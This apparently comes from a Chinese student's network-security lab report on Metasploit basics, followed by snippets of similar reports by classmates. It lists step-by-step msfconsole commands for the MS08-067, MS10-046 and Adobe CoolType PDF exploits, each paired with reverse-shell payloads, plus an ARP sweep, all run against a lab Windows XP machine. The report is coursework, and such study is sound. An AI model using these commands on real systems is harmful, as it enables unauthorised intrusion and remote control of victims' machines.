20155208徐子涵 Exp5 MSF基础应用

20155208徐子涵 Exp5 MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode.

  • Exploit:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞,所以说exploit和漏洞就是紧密相关的。
  • Payload:payload属于名词意思有:有效载荷,而在网络攻防这一领域,他也可以说成是有效攻击载荷,相当于是将shellcode进行执行。
  • Encode:encode的意思就是编码,主要是将后门等程序进行处理从而实现免杀等效果。

实践开始

实践一

MS08-067远程溢出漏洞攻击

  • 首先打开msfconsole界面,指令就是简单的msfconsole
  • 然后进行检索,使用指令search ms08_067 来对漏洞可以运用的攻击模块进行查询:

  • 然后对所查询的攻击模块进行观察,看我们要使用哪一种攻击模块,这次我们选择使用exploit/windows/smb/ms08_067_netapi

    使用show payload可以查看我们使用的有效攻击载荷:

  • 然后我们对所选取的payload进行设置,指令为set payload generic/shell_reverse_tcp ,然后show options查看设置状态:

这里要注意,我们需要设置RHOST和LHOST,一个是靶机的IP地址,另一个是攻击机的IP地址,设置成功:

  • 然后就是最紧张刺激的时刻,开始攻击exploit,好的,一次性成功,获取主机的shell,这下我们可以为所欲为了,那就看一下靶机系统信息,使用指令systeminfo:

  • OK,成功完成。

实践二

对浏览器攻击:ms10_046漏洞攻击

  • 开始的步骤总是那么的相似,打开平台,对攻击模块进行检索:

  • 这次我们选择使用的是exploit/windows/browser/ms10_046_shortcut_icon_dllloader

    查看show payload:

  • 这里我们所选择的payload是windows/meterpreter/reverse_tcp

    并进行设置,先用show options查看所需要设置的参数:

  • 与上一个实践不同的是:SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

  • 设置成功后,我们打开xp系统的IE浏览器,打开链接:http://192.168.88.134:80/:

  • 此时kali显示接入一个会话:

  • 使用 sessions -i 2 选择会话2(因为第一次IP地址输错了,所以不是会话1,而是会话2),成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:

  • OK,第二个实践大功告成。

实践三

对Adobe的漏洞攻击

  • 真的不想再重复上面那句话了,可是又有什么办法呢,还是要先打开平台检索和adobe漏洞有关的攻击模块啊:

  • 这次选择exploit/windows/fileformat/adobe_cooltype_sing,然后查看payload:

  • 选择windows/meterpreter/reverse_tcp来攻击,并使用show options查看所需要设置的参数:

  • 这个好哎,只需要设置主机IP就可以,设置成功后直接开始输入exploit,发现产生了一个pdf文件:

  • 找到这一文件(刚开始还没找到,后来发现这个文件被隐藏了,设置显示隐藏文件就可以看到了):

  • 然后将文件拷到靶机中,设置主机IP及端口,输入exploit开始攻击,另一方面,在靶机中打开pdf文件,发现成功获取靶机shell:

实践四

ARP攻击

msf > use auxiliary/scanner/discovery/arp_sweep
然后
set RHOSTS 192.168.108.0-192.168.108.255
然后 exploit进行攻击
  • 这个时候我们发现我们找到了192.168.88.130这一IP地址,这个就是我们想要找的靶机:

  • 可以发现NTP网络时间协议服务器,它是用来同步各个计算机的时间的协议用的

实践五

辅助模块的应用

  • 首先使用 show auxiliary 查看可以运用的辅助模块:

  • 这里我们选择ARP扫描,使用命令:use scanner/discovery/arp_sweep ,并使用show options查看参数:
  • 发现只需要设置主机的IP就可以
  • 使用exploit指令开始扫描,成功扫描到靶机的smb版本:

实验总结与体会

通过这次的实验,我们充分利用了msf这一平台,不过msf也仅仅只是一个品台,有很多攻击都不能通过其来实现,比如我们如果把靶机换成windows7或者以上版本的系统时,我们就很难攻击成功,所以如果我们还想在这一方面更进一步的话,我们就要多研究多琢磨,看看还有什么好的平台或者软件、漏洞才会更接近攻击的实现。

离实战还缺些什么技术或步骤?

我觉得距离实战还有不少的距离,我们要做到攻击就要绕过防火墙,而这次的实验整体都是关闭了防火墙来做的,还有就是怎么才能做到让靶机顺其自然的打开建立连接的文件,这都是值得思考的而问题。

原文地址:https://www.cnblogs.com/xuzihan/p/8933541.html

时间: 2024-10-14 07:01:08

20155208徐子涵 Exp5 MSF基础应用的相关文章

Exp5 MSF基础应用 20154302 薛师凡

Exp5 MSF基础应用 20154302 薛师凡 一.基础问题回答 (1)用自己的话解释什么是 exploit , payload , encode. exploit: 是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机. payload: 就是被运送的间谍,到了房子里头就可以执行各种间谍活动.简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务. encode: 是间谍穿的伪装的衣服,便

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23

20155338 《网络攻防》Exp5 MSF基础应用

20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶机中,相当于载具 payload负责执行相应的攻击代码,相当于载荷 encode是伪装,为了避免payload中坏字符影响功能,相当于编码 实验过程 Windows服务渗透攻击--MS08-067安全漏洞 攻击机:kali,ip:172.30.6.185 靶机:windows XP SP3,IP地址是172.

20155209 Exp5 MSF基础应用

Exp5 MSF基础应用 实验准备 在实验之前,上网搜集了很多有关Metasploit渗透测试的资料.对这次实验影响最大的是一篇最受欢迎的10个Metasploit模块和插件.排名第一位的是MSB-MS12-020,比MSB-MS08-067这个经典漏洞的排名还高.我就实验了这个,而且本次实验中很多试了一下这里面的受欢迎漏洞.但是大多数没成功. 实验MSB-MS12-020时,发现他是辅助模块下的漏洞,所以就先写辅助模块的项目. 成功应用任何一个辅助模块 应用MSB-MS12-020辅助模块 漏

20155301 《网络攻防》 Exp5 MSF基础应用

20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标靶机的这种漏洞或者个人信息,并可以进行一些比如摄屏.提权等操作. payload就是一个负载,可以负载程序或者数据等到目标靶机,实现攻击. encode是一个加密的工具,可以加密信息或者文件. Windows服务渗透攻击--ms07_029_msdns_zonename 基本信息 1.靶机型号:windows

20155333 《网络对抗》 Exp5 MSF基础应用

20155333 <网络对抗> Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:攻击手段,是能使攻击武器(payload)的方法: payload:攻击武器,真正具有攻击性的代码: encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行. 实践 一个主动攻击实践,如ms08_067 ①攻击机:kali ②靶机:windows XP SP3(English) 在攻击机kali输入m

20155331《网络对抗》Exp5 MSF基础应用

20155331<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 答:exploit就是漏洞利用.exploit就是利用一切可以利用的工具.采用一切可以采用的方法.找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档.添加自定义用户.甚至侵入网站获得管理员权限控制整个网站的最终目的. payload是攻击载荷,exploit把它传送到靶机中后,它就负责执行相应的攻击代码. encode是编码,实现